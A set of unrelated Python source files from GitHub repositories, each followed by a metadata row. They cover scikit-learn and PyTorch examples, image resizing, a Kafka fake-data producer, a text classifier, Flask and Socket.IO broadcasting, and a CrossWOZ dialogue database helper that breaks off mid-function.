        y_pred_prob = self.model.predict_proba(x)
        y_pred_prob = pd.DataFrame(y_pred_prob, index=x.index)
        return y_pred, y_pred_prob

    def evaluate(self, x, y_true):
        """Return weighted F1 and accuracy of the model on (x, y_true)."""
        # Local import fix: `import sklearn` alone does not guarantee that
        # the sklearn.metrics submodule is importable as an attribute.
        from sklearn.metrics import accuracy_score, f1_score
        scores = {}
        y_pred, _ = self.predict(x)
        scores["f1"] = f1_score(
            y_true.values,
            y_pred.values.flatten(),
            average="weighted",
            labels=np.unique(y_pred.values.flatten()),
        )
        scores["accuracy"] = accuracy_score(
            y_true.values, y_pred.values.flatten()
        )
        return scores

    def save(self, directory):
        """Pickle the model and class definition into *directory* (created if missing)."""
        # Bug fix: accept plain string paths — the original applied `/` to the
        # raw argument, which fails for str (load() already wraps with Path).
        directory = Path(directory)
        directory.mkdir(parents=True, exist_ok=True)
        with open(directory / "model.pkl", "wb") as fh:
            pickle.dump(self.model, fh)
        with open(directory / "classes.pkl", "wb") as fh:
            pickle.dump(self.classes, fh)

    def load(self, directory):
        """Load a previously saved model and class definition from *directory*."""
        with open(Path(directory) / "model.pkl", "rb") as fh:
            self.model = pickle.load(fh)
        with open(Path(directory) / "classes.pkl", "rb") as fh:
            self.classes = pickle.load(fh)
| AlexisMignon/openstf | openstf/model/capacity/model.py | model.py | py | 2,790 | python | en | code | null | github-code | 36 |
756466471 | import argparse
import time
from utils import load_weights, read_mnist, preprocessing_data
from sklearn.metrics import classification_report
from my_svm import MySvm
def parse_args():
    """Parse CLI options: MNIST test image/label paths, saved model path, kernel type."""
    images_default = 'samples/t10k-images-idx3-ubyte.gz'
    labels_default = 'samples/t10k-labels-idx1-ubyte.gz'
    model_default = 'samples/my_model'

    parser = argparse.ArgumentParser()
    parser.add_argument(
        '-x', '--x_test_dir', default=images_default,
        help=f'path to the file with the testing sample\'s records, '
             f'default: {images_default}')
    parser.add_argument(
        '-y', '--y_test_dir', default=labels_default,
        help=f'path to the file with the testing sample\'s labels, '
             f'default: {labels_default}')
    parser.add_argument(
        '-m', '--model_input_dir', default=model_default,
        help='path to the file for loading model, '
             f'default: {model_default}')
    parser.add_argument(
        '-k', '--kernel', default='poly',
        help='kernel function: \'linear\' or \'poly\', default: \'poly\'')
    return parser.parse_args()
def main():
    """Evaluate a saved SVM on the MNIST test set and print a classification report."""
    args = parse_args()
    path_to_x_test = args.x_test_dir
    path_to_y_test = args.y_test_dir
    path_to_model = args.model_input_dir
    kernel = args.kernel
    # Load and preprocess the raw images; image_shape is needed by the kernel.
    X_original = read_mnist(path_to_x_test)
    X_test, image_shape = preprocessing_data(X_original)
    y_test = read_mnist(path_to_y_test)
    # Restore the trained classifier weights and predict.
    weights = load_weights(path_to_model)
    clf = MySvm(kernel_type=kernel, image_shape=image_shape)
    clf.load_weights(weights)
    predict_labels = clf.predict(X_test)
    print('Metrics on the test data:\n')
    print(classification_report(y_test, predict_labels, digits=4))
if __name__ == "__main__":
    # Time the whole evaluation run and report it in min/sec.
    start_time = time.time()
    main()
    exec_time = time.time() - start_time
    print(f'\n\nExecution time: {exec_time//60:5.0f} min, {exec_time%60:1.3} sec\n')
| albellov/mrg_mlcourse_module1 | predict.py | predict.py | py | 1,990 | python | en | code | 1 | github-code | 36 |
# Collect train/val accuracy histories for SMH models trained with a reduced
# topic count, to be plotted below.
import matplotlib.pyplot as plt
import numpy as np
import python.results.values as v
import python.tools as tools
import python.argumets as a
import python.embeddings as emb
import os
# Parameters as they currently stand.
TUPLE_SIZE = 2 # 3 This is r.
COOCURRENCE_THRESHOLDS = 0.02 # 0.03
OVERLAP = 0.9
MIN_CLUSTER_SIZE = 5 # 10
TOP_TOPIC_WORDS = 10
fileName = v.fileName
x_graph = [] # x values of the plot (the topicN values we do have a history for)
y_graph_train = [] # y values: mean train accuracy
y_graph_val = [] # y values: mean validation accuracy
histories_list = [] # names of the pickle files holding each training history
# Walk the *history* directory to see which models have been trained.
dirsHist = os.listdir( 'history' )
# For each topicN_, look for a matching training history and record it.
for topicN_ in v.x_values:
    # NOTE(review): getSMHextension is neither defined nor imported in this
    # file — confirm where it is supposed to come from.
    extension = getSMHextension(embType='', tupSize=TUPLE_SIZE, coo=COOCURRENCE_THRESHOLDS,
                                overlap=OVERLAP, minClustS=MIN_CLUSTER_SIZE, topicN=topicN_)
    # NOTE(review): under Python 3, filter() returns a lazy iterator, so the
    # `if` below is always truthy and listDirs[-1] raises TypeError; this
    # code only works on Python 2 unless wrapped in list().
    listDirs = filter(lambda x : extension in x, dirsHist )
    if listDirs :
        historyDir = listDirs[-1]
        x_graph.append(topicN_)
        histories_list.append(historyDir)
# For each history, average the accuracy of the last 5 epochs into the y series.
# NOTE(review): rebinding `a` here shadows the `python.argumets` import alias.
for file in histories_list:
    a = tools.loadPickle(file)
    ac = a['acc'][-5:]
    train_acc = sum(ac)/len(ac)
    y_graph_train.append(train_acc)
    vac = a['val_acc'][-5:]
    val_acc = sum(vac)/len(vac)
    y_graph_val.append(val_acc)
# We now have acc and val_acc for every training run.
# Build the plot
34023322627 | import PIL.Image
import os
def resize_image(image_path, new_width, new_height):
    """Shrink the image at *image_path* to fit within (new_width, new_height).

    The aspect ratio is preserved by PIL's thumbnail(), which resizes the
    image in place; the (modified) image object is returned.

    Args:
        image_path: path to the image file.
        new_width: maximum width of the result.
        new_height: maximum height of the result.

    Returns:
        The resized PIL image.
    """
    image = PIL.Image.open(image_path)
    # Bug fix: the original multiplied BOTH target dimensions by the aspect
    # ratio, distorting the requested bounding box; thumbnail() already
    # preserves aspect ratio on its own.
    # PIL.Image.ANTIALIAS was removed in Pillow 10; LANCZOS is its replacement.
    image.thumbnail((new_width, new_height), PIL.Image.LANCZOS)
    return image
def crop_Image(img_path, save_path):
    """Crop the image at *img_path* to a top-aligned width x width square and save it."""
    source = PIL.Image.open(img_path)
    box = (0, 0, source.width, source.width)
    source.crop(box).save(save_path)
if __name__ == "__main__":
H = 300
W = 300
resized_image = resize_image("res/thumbnail/2104007_ete_21.png", 300, 300).save(
"res/thumbnail/2104007_ete_21.png"
)
# resized_image.save("resized_image.jpg")
for img in os.listdir("res/thumbnail"):
image_path = f"res/thumbnail/{img}"
# resize_image(image_path, W, H).save(image_path)
crop_Image(image_path, image_path)
print(f"Cropped {image_path} and saved at {image_path}")
| dev5h/ete21 | resize_thumbnails.py | resize_thumbnails.py | py | 1,264 | python | en | code | 0 | github-code | 36 |
# Worked examples of PyTorch autograd: scalar backward, a tiny network,
# and vector-Jacobian products for non-scalar outputs.
import torch
print("\n---First example---")
x = torch.ones(2, 2, requires_grad=True)
y = x + 2
z = y * y * 3
out = z.mean()
out.backward()
# out = mean(3*(x+2)^2) over 4 entries, so d(out)/dx = 6*(x+2)/4 = 4.5 at x=1.
print("x.grad:", x.grad)
# # ----- ----- ----- -----
# # alternative: comment previous backward() and x.grad references
# print("x.grad alternative:", torch.autograd.grad(outputs=out, inputs=x))
# # ----- ----- ----- -----
# ----- ----- ----- -----
# Neural network example
# ----- ----- ----- -----
print("\n---Neural network example---")
x = torch.ones(8) # input tensor
y = torch.zeros(10) # expected output
W = torch.randn(8, 10, requires_grad=True) # weights
b = torch.randn(10, requires_grad=True) # bias vector
z = torch.matmul(x, W)+b # output
loss = torch.nn.functional.binary_cross_entropy_with_logits(z, y)
loss.backward()
# print(W.grad) #OK
print("b.grad:", b.grad) #OK
# x and y were created without requires_grad, so their .grad prints None.
print("x.grad:",x.grad)
print("y.grad:",y.grad)
# print(z.grad) # WARNING: non-leaf tensors do not retain .grad by default
# print(loss.grad) # WARNING
# ----- ----- ----- -----
# Vector-Jacobian example #1
# ----- ----- ----- -----
print("\n---Vector-Jacobian example #1---")
x = torch.rand(3, requires_grad=True)
y = x + 2
# y.backward() <---
# RuntimeError: grad can be implicitly
# created only for scalar outputs
# try ---> y.backward(v) where v is any tensor of length 3
# v = torch.rand(3)
v = torch.tensor([1.,2,3])
y.backward(v)
# dy/dx is the identity, so x.grad equals v.
print("x.grad:", x.grad)
# # ----- ----- ----- -----
# # alternative: comment previous backward() and x.grad references
# print("x.grad alternative:",torch.autograd.grad(outputs=y, inputs=x, grad_outputs=v))
# # ----- ----- ----- -----
# ----- ----- ----- -----
# Vector-Jacobian example #2
# ----- ----- ----- -----
print("\n---Vector-Jacobian example #2---")
x = torch.tensor([1., 2], requires_grad=True)
print('x:', x)
y = torch.empty(3)
y[0] = x[0]**2
y[1] = x[0]**2 + 5*x[1]**2
y[2] = 3*x[1]
print('y:', y)
v = torch.tensor([1., 1, 1,])
y.backward(v)
print('x.grad:', x.grad)
# ----- ----- ----- -----
# General case example
# ----- ----- ----- -----
print("\n---General case example---")
x = torch.tensor([[1.,2,3],[4,5,6]], requires_grad=True)
y = torch.log(x)
# y is a 2x3 tensor obtained by taking the logarithm entry-wise
v = torch.tensor([[3.,2,0],[4,0,1]], requires_grad=True)
# v is not a 1D tensor!
y.backward(v)
print("x.grad:", x.grad) # returns dl/dx, as evaluated by "matrix-Jacobian" product v * dy/dx
# therefore we can interpret v as a matrix dl/dy
# for which the chain rule expression dl/dx = dl/dy * dy/dx holds.
# -*- coding: utf-8 -*-
"""
Task 6.1

The list ``mac`` contains MAC addresses in the format XXXX:XXXX:XXXX.
Cisco equipment, however, uses the format XXXX.XXXX.XXXX.
Write code that converts the MAC addresses to the Cisco format
and appends them to a new list ``mac_cisco``.
Restriction: all tasks must be solved using only the topics covered so far.
"""
mac_cisco = [] # new list for the converted MAC addresses
# NOTE(review): `mac` is expected to be defined by the exercise template.
for mac_item in mac: # convert each address by swapping ':' for '.'
    mac_cisco.append(mac_item.replace(':', '.'))
print(mac_cisco) # show the converted list
10410217579 | import json
import random
from pykafka import KafkaClient
from datetime import datetime
import time
from faker import Faker
# Kafka connection settings for the demand/supply simulation topic.
CONS_KAFKA_TOPIC = "test-demand3"
CONS_KAFKA_SERVER = "localhost:9092"
#creating instances of Kafka variables
kafka_client = KafkaClient(CONS_KAFKA_SERVER)
kafka_topic = kafka_client.topics[CONS_KAFKA_TOPIC]
producer = kafka_topic.get_producer()
consumer = kafka_topic.get_simple_consumer()
#initializing necessary variables
captain_data = {}
user_data = {}
# NOTE(review): `id` shadows the builtin id() for the rest of this module.
id = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]
age = [21,20,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40]
fake = Faker()
# Load candidate (lat, long) pairs extracted from GeoJSON.
with open('demand_supply.json') as f:
    json_array = json.load(f)
    coordinates = json_array['coordinates']
#generates captain data and produces to the demand_supply topic every 1 minute
def gen_captain_data():
    """Publish 50 synthetic captain (supply) events to the demand/supply Kafka topic."""
    for _ in range(50):
        captain_data['capId'] = random.choice(id)
        captain_data['name'] = fake.name()
        captain_data['email'] = fake.email()
        captain_data['age'] = random.choice(age)
        captain_data['event-type'] = 'captain'
        point = random.choice(coordinates)
        captain_data['lat'], captain_data['long'] = point[0], point[1]
        captain_data['timestamp'] = str(datetime.utcnow())
        producer.produce(json.dumps(captain_data).encode('ascii'))
#generates user data and produces to the demand_supply topic every 2 minutes
def gen_user_data():
    """Publish 40 synthetic user (demand) events to the demand/supply Kafka topic."""
    for _ in range(40):
        user_data['userId'] = random.choice(id)
        user_data['name'] = fake.name()
        user_data['email'] = fake.email()
        user_data['age'] = random.choice(age)
        user_data['event-type'] = 'user'
        point = random.choice(coordinates)
        user_data['lat'], user_data['long'] = point[0], point[1]
        user_data['timestamp'] = str(datetime.utcnow())
        producer.produce(json.dumps(user_data).encode('ascii'))
if __name__ == '__main__':
    gen_captain_data()
    gen_user_data()
    # Echo everything consumed from the topic (blocks indefinitely).
    for message in consumer:
        print(f"{message.offset}: {message.value}")
| ayushmanadhikari/kafka-basics | pykafka-dir/demand_supply.py | demand_supply.py | py | 2,341 | python | en | code | 0 | github-code | 36 |
# -*- coding: utf-8 -*-
"""
IPC-section text classifier: Bag-of-Words features + linear SVM.

Created on Sun Jun 28 21:01:17 2020
@author: Hemakshi Pandey
"""
import numpy as np
import pandas as pd
import nltk
import pickle
import re
from nltk.corpus import stopwords
nltk.download('stopwords')
# WordNet data is required by the lemmatizer below.
nltk.download('wordnet')
wnlem = nltk.WordNetLemmatizer()
nltk.download('punkt')
"""## Importing the dataset"""
# Labelled definitions of IPC sections 302, 307 and 376.
dataset = pd.read_csv('Final_IPC_label_data.csv')
dataset.head()
"""## Cleaning the texts"""
corpus = []
# NOTE(review): the row count 578 is hard-coded; prefer len(dataset).
for i in range(0, 578):
    # Keep letters only, lowercase, split on whitespace.
    definition = re.sub('[^a-zA-Z]', ' ', dataset['Definition'][i])
    definition = definition.lower()
    definition = definition.split()
    # NOTE(review): the lemmatizer and stopword list are rebuilt on every
    # iteration; hoisting them out of the loop would be cheaper.
    wnlem = nltk.WordNetLemmatizer()
    all_stopwords = stopwords.words('english')
    definition = [wnlem.lemmatize(word) for word in definition if not word in set(all_stopwords)]
    definition = ' '.join(definition)
    corpus.append(definition)
print(corpus)
"""## Creating the Bag of Words model"""
from sklearn.feature_extraction.text import CountVectorizer
# Token-count representation capped at the 620 most frequent terms.
cv = CountVectorizer( max_features = 620)
X = cv.fit_transform(corpus).toarray()
y = dataset.iloc[:, -1].values
len(X[0])
"""## Splitting the dataset into the Training set and Test set"""
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state = 0)
"""## Training the Support Vector Machine model on the Training set"""
from sklearn.svm import SVC
classifier = SVC(kernel = 'linear', random_state = 0)
classifier.fit(X_train, y_train)
"""## Predicting the Test set results"""
y_pred = classifier.predict(X_test)
# Show predictions side by side with the ground truth.
print(np.concatenate((y_pred.reshape(len(y_pred),1), y_test.reshape(len(y_test),1)),1))
"""## Making the Confusion Matrix"""
from sklearn.metrics import confusion_matrix, accuracy_score
cm = confusion_matrix(y_test, y_pred)
print(cm)
accuracy_score(y_test, y_pred)
# Persist the trained classifier for the Flask deployment.
with open('C:/DEPLOYMENT/SVMclassifier.pkl','wb') as model_SVM_pkl:
    pickle.dump(classifier,model_SVM_pkl)
# Persist the fitted CountVectorizer so inference uses the same vocabulary.
with open('C:/DEPLOYMENT/bagofwordsmodel.pkl','wb') as model_BOW_pkl:
    pickle.dump(cv,model_BOW_pkl)
9786554436 | """
文件夹的相关操作
创建
获取当前目录
改变默认目录
获取目录列表
删除文件夹
"""
import os
# 创建文件夹
# os.mkdir("zhangsan")
# 获取当前的目录
dir = os.getcwd()
print("当前的目录: ", dir)
# 改变默认目录
# os.chdir("../")
# 获取目录列表
dirList = os.listdir("./")
for dir in dirList:
print(dir)
# 删除文件夹
os.rmdir("zhangsan")
| ilaoda/python | 07_文件操作/07_6_文件夹的相关操作.py | 07_6_文件夹的相关操作.py | py | 433 | python | zh | code | 0 | github-code | 36 |
# Visualise a max-flow/min-cut segmentation: colour each pixel by whether the
# solver attached it to the source (green) or the sink (red).
import cv2
import numpy as np
from math import exp, pow
FILENAME = "testbaby"
SIZE = 200
OBJCOLOR, BKGCOLOR = (0, 0, 255), (0, 255, 0)
SOURCE, SINK = -2, -1
def read_cuts(filename, image):
    """Read the solver output and paint *image* in place: '0' -> sink (red),
    anything else -> source (green). Returns None."""
    with open(filename, "r") as f:
        lines = f.readlines()
    # NOTE(review): mf (the max-flow value on line 1) is read but never used.
    mf = int(lines[0])
    idx = 0
    for char in lines[1]:
        if idx >= SIZE*SIZE:
            break
        # Row-major mapping from the flat character index to (row, col).
        r, c = idx // SIZE, idx % SIZE
        idx += 1
        if char == '0':
            # attached to sink
            image[r][c] = (0, 0, 255)
        else:
            # attached to source
            image[r][c] = (0, 255, 0)
image = cv2.imread("{}.jpg".format(FILENAME), cv2.IMREAD_GRAYSCALE)
image = cv2.resize(image, (SIZE, SIZE))
seeded_image = cv2.imread("{}seeded.jpg".format(FILENAME), cv2.IMREAD_COLOR)
seeded_image = cv2.resize(seeded_image, (SIZE, SIZE), interpolation=cv2.INTER_NEAREST)
unresized_seeded = cv2.resize(seeded_image, (SIZE*10, SIZE*10), interpolation=cv2.INTER_NEAREST)
V = image.size + 2
graph = np.zeros((V, V), dtype="int32")
# NOTE(review): read_cuts returns None, so `cuts` is always None; the .format
# call here has no placeholder and is a no-op.
cuts = read_cuts("graph_output.txt".format(FILENAME), seeded_image)
cv2.imshow("image", image)
cv2.imshow("seeded image", seeded_image)
cv2.imshow("unresized seeded image", unresized_seeded)
cv2.waitKey(0)
769211687 | import glob
from music21 import converter, instrument, note, chord
def get_notes():
    """ Get all the notes and chords from the midi files in the ./midi_songs directory """
    collected = []
    for file in glob.glob("rammstein/*.mid*"):
        midi = converter.parse(file)
        print("Parsing %s" % file)
        try:
            # file has instrument parts: take the first part's elements
            partitioned = instrument.partitionByInstrument(midi)
            stream_to_parse = partitioned.parts[0].recurse()
        except:
            # file has notes in a flat structure
            stream_to_parse = midi.flat.notes
        collected.extend(parse_notes(stream_to_parse))
    return collected
def parse_notes(notes_to_parse):
    """Translate a stream of music21 elements into [pitch, duration] pairs.

    Notes, chords and rests are handled; anything else is skipped.
    """
    dispatch = (
        (note.Note, parse_note),
        (chord.Chord, parse_chord),
        (note.Rest, parse_rest),
    )
    parsed = []
    for element in notes_to_parse:
        for element_type, handler in dispatch:
            if isinstance(element, element_type):
                parsed.append(handler(element))
                break
    return parsed
def parse_note(element):
    """Return [pitch name, duration type] for a single music21 Note."""
    return [str(element.pitch), element.duration.type]
def parse_chord(element):
    """Return [dot-joined pitch names, duration type] for a music21 Chord."""
    member_pitches = [str(member.pitch) for member in element.notes]
    return ['.'.join(member_pitches), element.duration.type]
def parse_rest(element):
    """Return [rest name, duration type] for a music21 Rest."""
    return [element.name, element.duration.type]
41654793539 | import numpy as np
def IsInCollision(x,obc):
    """Axis-aligned box collision test of point *x* against the obstacle
    centres in *obc* (fixed per-obstacle box sizes, up to 10 obstacles)."""
    size = [[5, 5, 10], [5, 10, 5], [5, 10, 10], [10, 5, 5], [10, 5, 10], [
        10, 10, 5], [10, 10, 10], [5, 5, 5], [10, 10, 10], [5, 5, 5]]
    point = np.asarray([x[0], x[1], x[2]], dtype=np.float32)
    for idx, center in enumerate(obc):
        hit = True
        for axis in range(3):
            coord = point[axis]
            # Outside this obstacle's half-extent on some axis (while the
            # coordinate is inside the [-20, 20) workspace) => no collision.
            if abs(center[axis] - coord) > size[idx][axis] / 2.0 and coord < 20.0 and coord > -20:
                hit = False
                break
        if hit:
            return True
    return False
20319120410 | import flask
import flask_redis
import flask_socketio
import time
import threading
import json
# Shared extensions, bound to the Flask app inside create_app().
redis_store = flask_redis.FlaskRedis()
socketio = flask_socketio.SocketIO()
def get_data_for_hashtag(tag):
    """Return entries 0..1000 of the Redis list stored under *tag* (raw bytes)."""
    return redis_store.lrange(tag, 0, 1000)
def broadcast_thread():
    """Poll Redis for 'points-*' keys and emit each key's newest value on its
    category's Socket.IO namespace. Runs forever (daemon thread)."""
    while True:
        # poll every 200 ms
        time.sleep(0.2)
        # get all keys for datapoints:
        keys = redis_store.keys(pattern="points-*")
        for k in keys:
            # key format: b"points-<category>"
            category = k.decode("utf-8").partition('-')[2]
            val = redis_store.lindex(k, 0)
            socketio.emit('points', {"p": float(val)}, namespace="/{}".format(category))
def broadcast_mentions():
    """Every 2 s, pop one queued mention per 'mentions-*' key and emit it on
    that category's Socket.IO namespace. Runs forever (daemon thread)."""
    while True:
        time.sleep(2)
        keys = redis_store.keys(pattern="mentions-*")
        for k in keys:
            category = k.decode("utf-8").partition('-')[2]
            if redis_store.llen(k) == 0:
                continue
            element = redis_store.lpop(k)
            try:
                jelement = json.loads(element)
            except ValueError:
                # skip malformed JSON payloads
                continue
            # NOTE(review): .format(k) on 'mentions' is a no-op (no placeholder).
            socketio.emit('mentions'.format(k), jelement, namespace="/{}".format(category))
#, namespace="/{}".format(k)
def create_app():
    """Build the Flask app, bind Redis and Socket.IO, and start both
    broadcaster daemon threads."""
    app = flask.Flask(__name__)
    redis_store.init_app(app)
    socketio.init_app(app)
    # Daemon threads die with the process; no explicit shutdown needed.
    thread = threading.Thread(target=broadcast_thread)
    thread.daemon = True
    thread.start()
    thread = threading.Thread(target=broadcast_mentions)
    thread.daemon = True
    thread.start()
    return app
@app.route("/")
def line():
left = {
"category": "ichackupper",
"data": get_data_for_hashtag("ichackupper")
}
right = {
"category": "ichacklower",
"data": get_data_for_hashtag("ichacklower")
}
return flask.render_template("index.html", left=left, right=right)
| thelinerocks/lineweb | app.py | app.py | py | 1,855 | python | en | code | 0 | github-code | 36 |
# AGConnect cloud-function demo: call the deployed "callback" function with
# string and binary payloads.
import asyncio
import os
from agconnect.common_server import AGCClient
from agconnect.common_server import CredentialParser
from agconnect.cloud_function import AGConnectFunction
# Initialise the AGC client from the bundled service credentials file.
AGCClient.initialize("real_cli",
                     credential=CredentialParser.to_credential(
                         (os.path.join(os.path.dirname(__file__), '[PATH]/agconnect_credentials.json'))))
agcFunction = AGConnectFunction.get_instance()
async def my_handler_test():
    """Call the 'callback' cloud function ($latest) with a string and a binary buffer."""
    value = agcFunction.wrap("callback", "$latest")
    # timeout in milliseconds
    value.set_timeout(20000)
    test_str = "test s string"
    res = await value.call(test_str)
    print(f"res: {res.get_value()}")
    buf = memoryview(bytearray(10))
    res3 = await value.call(buf)
    print(f"res2: {res3.get_value()}")
async def my_handler():
    """Call 'callback' and assert the canned response matches."""
    good_res = {'simple': 'example'}
    test_str = "test s string"
    res = await agcFunction.wrap("callback", "$latest").call(test_str)
    print(f"res: {res.get_value()}")
    assert res.get_value() == good_res
# NOTE(review): only my_handler_test runs; my_handler is defined but unused.
# asyncio.get_event_loop() is deprecated for this use; asyncio.run() is the
# modern entry point.
loop = asyncio.get_event_loop()
loop.run_until_complete(my_handler_test())
| AppGalleryConnect/agc-server-demos-python | cloudfunction/main.py | main.py | py | 1,075 | python | en | code | 0 | github-code | 36 |
# Least common multiple: read T test cases of two integers each.
t = int(input())
# NOTE(review): max_num is never used below — confirm it can be removed.
max_num = 450001
def gcd(a, b):
    """Greatest common divisor of a and b via the Euclidean algorithm (b > 0)."""
    while a % b:
        a, b = b, a % b
    return b
for _ in range(t):
    x, y = map(int, input().split())
    # lcm(x, y) = x * y / gcd(x, y)
    under_gcd = gcd(x, y)
    result = (x*y)//under_gcd
    print(result)
23211155458 | from math import fabs
from os.path import split
from re import sub
from utils.tools import addWordsToJieba, splitSentence
import ujson
import os
from utils.config import DATASET
import jieba
from io import BytesIO, StringIO
# File names of the five CrossWOZ domain databases.
attraction_db_path = "attraction_db.json"
hotel_db_path = "hotel_db.json"
metro_db_path = "metro_db.json"
restaurant_db_path = "restaurant_db.json"
taxi_db_path = "taxi_db.json"
# Each DB record is a [entity_name, attrs_dict] pair.
EntityIndex = 0
AttrsDictIndex = 1
#SPO_index satified MEMTOKEN
SUBJECT_INDEX=0
PREDICATE_INDEX=1
OBJECT_INDEX=2
"""
(subject-predicate-object(predicateInfo))
(entity-predicate-predicateInfo)
(subject-name-entity)
name is kind of predicate
entity is object
"""
SUBJECT_KEY = "领域"
ENTITIES_KEY = "名称"
# The five subject domains: attraction, hotel, restaurant, metro, taxi.
SUBJECTS = ["景点", "酒店", "餐馆", "地铁", "出租"]
def getDictfromDataBase(filepath: str):
    """Load one database JSON file from data/<DATASET>/database/ and return its content."""
    full_path = os.path.join(os.getcwd(), "data", DATASET, "database", filepath)
    with open(full_path, encoding='utf-8') as handle:
        return ujson.load(handle)
# equals
# attraction_db = getDictfromDataBase(attraction_db_path)
# hotel_db = getDictfromDataBase(hotel_db_path)
# metro_db = getDictfromDataBase(metro_db_path)
# restaurant_db = getDictfromDataBase(restaurant_db_path)
# taxi_db = getDictfromDataBase()
# Load the five databases in the same order as SUBJECTS.
dbs = [getDictfromDataBase(path) for path in iter((
    attraction_db_path, hotel_db_path, metro_db_path, restaurant_db_path, taxi_db_path))]
# ChooseDataBaseBySubjectName = {SUBJECTS[i]: db for i,db in enumerate(dbs)}
ChooseDataBaseBySubjectName = dict()
for i, each in enumerate(SUBJECTS):
    ChooseDataBaseBySubjectName.setdefault(each,dbs[i])
PREDICATES = {}
# Predicate names per subject, taken from the first record of each database.
# NOTE(review): initPredicate() below appends the same keys again, so every
# predicate list ends up duplicated — confirm whether both are needed.
PREDICATES = {eachSubject: [key for key in ChooseDataBaseBySubjectName[
    eachSubject][0][AttrsDictIndex].keys()] for eachSubject in SUBJECTS}
# for eachSubject in SUBJECTS:
#     database = ChooseDataBaseBySubjectName[]
ENTITIES = []
ENTITIES_belongs_SUBJECTS={}
def initPredicate(dbs: tuple):
    """Append the attribute keys of each subject's first record to PREDICATES.

    The *dbs* argument is accepted for interface symmetry but not used; data
    is read through ChooseDataBaseBySubjectName.
    """
    for subject in SUBJECTS:
        attrs = ChooseDataBaseBySubjectName[subject][0][AttrsDictIndex]
        PREDICATES.setdefault(subject, [])
        PREDICATES[subject].extend(attrs.keys())
def initEntitiesAndEntities_belongs(dbs: tuple):
    """Record every entity name and map it to the subject of its source database."""
    for db_index, database in enumerate(dbs):
        subject = SUBJECTS[db_index]
        for record in database:
            name = record[EntityIndex]
            ENTITIES.append(name)
            ENTITIES_belongs_SUBJECTS.setdefault(name, subject)
# Populate the global lookup tables from the loaded databases.
initPredicate(dbs)
initEntitiesAndEntities_belongs(dbs)
# Keep jieba from splitting dataset terms into sub-words.
# Loading a dict file did not affect segmentation, so words are added directly.
# dict_path = os.path.join(os.getcwd(), 'data', 'crossWOZ', 'dict.txt')
# if os.path.isfile(dict_path):
#     with open(dict_path, "r+", encoding="utf8") as file:
#         for each in SUBJECTS:
#             file.writelines(' 3 n \n'.join(PREDICATES[each]))
#         file.writelines(' 3 n \n'.join(SUBJECTS))
#         file.writelines(' 3 n \n'.join(ENTITIES))
#         jieba.load_userdict(file)
for each in SUBJECTS:
    addWordsToJieba(PREDICATES[each])
addWordsToJieba(SUBJECTS)
addWordsToJieba(ENTITIES)
# def getSubjectByEntityThroughDBs(dbs: tuple, ent: str) -> str:
#     for database in dbs:
#         for item in database:
#             if item[EntityIndex] is ent:
#                 return item[AttrsDictIndex][SUBJECT_KEY]
#     return None
def getSubjectByEntity(ent: str) -> str:
    """Return the subject/domain this entity name belongs to (KeyError if unknown)."""
    return ENTITIES_belongs_SUBJECTS[ent]
def getAttrsByEntityThroughDBs(dbs: tuple, ent: str) -> dict:
    """Search every database for *ent* and return its attribute dict, or None.

    Bug fix: the original compared names with `is` (object identity), which
    only matches when both strings are literally the same object; `==`
    (equality) is required for runtime-built strings.
    """
    for database in dbs:
        for item in database:
            if item[EntityIndex] == ent:
                return item[AttrsDictIndex]
    return None
def getAttrsByEntity(ent: str) -> dict:
    """Return the attribute dict of *ent* from its own subject's database, or None."""
    subject_db = ChooseDataBaseBySubjectName[ENTITIES_belongs_SUBJECTS[ent]]
    matches = [rec[AttrsDictIndex] for rec in subject_db if rec[EntityIndex] == ent]
    return matches[0] if matches else None
def getEntitesBySPO(subject: str, predicate: str, predicateInfo: str):
    """Return names of entities under *subject* whose *predicate* value equals
    *predicateInfo*, or None when there are no matches.

    Bug fix: the value comparison used `is` (identity) instead of `==`
    (equality), so runtime-built strings never matched.
    """
    database = ChooseDataBaseBySubjectName[subject]
    entities = [item[EntityIndex] for item in database
                if item[AttrsDictIndex][predicate] == predicateInfo]
    return entities if entities else None
def getEntitesBySubject(subject: str)->list:
    """Return all entity names stored under *subject*, or None when empty."""
    names = [record[EntityIndex] for record in ChooseDataBaseBySubjectName[subject]]
    return names or None
def getEntityAttrs(ent:str):
    """Return the attribute dict of *ent*, or None when it is not in its subject's DB.

    Bug fixes: the name comparison used `is` (identity), so runtime-built
    strings never matched; the not-found None return is now explicit.
    """
    database = ChooseDataBaseBySubjectName[ENTITIES_belongs_SUBJECTS[ent]]
    for item in database:
        if item[EntityIndex] == ent:
            return item[AttrsDictIndex]
    return None
def getEntitesAttrsBySubjectAndPredicate(subject: str, predicate: str)->dict:
    """Map entity name -> attribute dict for records under *subject* that have
    *predicate* among their attribute keys; None when no record qualifies.

    Bug fix: the key comparison used `is` (identity) instead of `==`
    (equality); membership (`in`) expresses the intended check directly.
    """
    database = ChooseDataBaseBySubjectName[subject]
    matches = {}
    for item in database:
        if predicate in item[AttrsDictIndex]:
            # setdefault keeps the first record for a duplicated entity name,
            # matching the original's behaviour.
            matches.setdefault(item[EntityIndex], item[AttrsDictIndex])
    return matches if matches else None
# def getEntitiesBySubjectAndInformPredicate(subject: str, predicate: str,inform_predicate) -> dict:
# database = ChooseDataBaseBySubjectName[subject]
# ENTITIES = []
# for item in database:
# if item[AttrsDictIndex][predicate] is inform_predicate:
# ENTITIES.append(item[EntityIndex])
# return ENTITIES if len(ENTITIES) else None
def findEntities(splitWords:list):
    """Return the words that are known entity names, or None when there are none.

    Idiom fix: `word in ENTITIES` replaces the explicit `__contains__` call.
    (ENTITIES is a list, so each test is O(n); a module-level set would be
    faster if this becomes hot.)
    """
    found = [word for word in splitWords if word in ENTITIES]
    return found or None
def findPredicatesBySubject(splitWords:list,subject:str):
    """Return the words that are predicates of *subject*, or None when none match.

    Idiom fix: membership test replaces the explicit `__contains__` call.
    """
    found = [word for word in splitWords if word in PREDICATES[subject]]
    return found or None
def findPredicatesByEnt(splitWords:list,ent:str):
    """Return the words that are predicates of *ent*'s subject, or None when none match.

    Idiom fix: membership test replaces the explicit `__contains__` call.
    """
    subject_predicates = PREDICATES[ENTITIES_belongs_SUBJECTS[ent]]
    found = [word for word in splitWords if word in subject_predicates]
    return found or None
def findSubjects(splitWords:list):
    """Return the words that are subject (domain) names, or None when there are none.

    Bug fix: the original appended the accumulator list to itself
    (`subjects.append(subjects)`) instead of appending the matching word,
